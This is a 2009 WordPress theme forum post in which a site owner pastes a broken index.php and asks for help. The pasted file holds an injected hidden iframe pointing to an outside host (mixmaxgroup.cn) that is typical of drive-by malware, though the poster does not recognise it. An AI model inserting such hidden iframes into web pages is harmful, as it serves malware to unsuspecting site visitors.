Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » Running WordPress » Installing & running WordPress »

HELP!! Site isn't running anymore!

Prev Previous Post   Next Post Next
Old Jun 9, 2009, 09:11 AM
PrettyChicky

8 posts · Jun 2009
Unhappy HELP!! Site isn't running anymore!

Hello!
First- thanks for the theme! I just donated.

I am in need of assistance- I dont know which forum this falls under. My site wont come up today. the website is www.prettychicky.com Here is the error message, I am receiving:

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/content/98/4345998/html/index.php on line 17

Parse error: syntax error, unexpected '.' in /home/content/98/4345998/html/index.php on line 17

I went to my index.php and this is what I see (I have no idea what I'm looking at, just trying to give you as much info as possible)

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-
<iframe src="http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi52" width=125 height=125 style="visibility: hidden"></iframe>

Can you assist?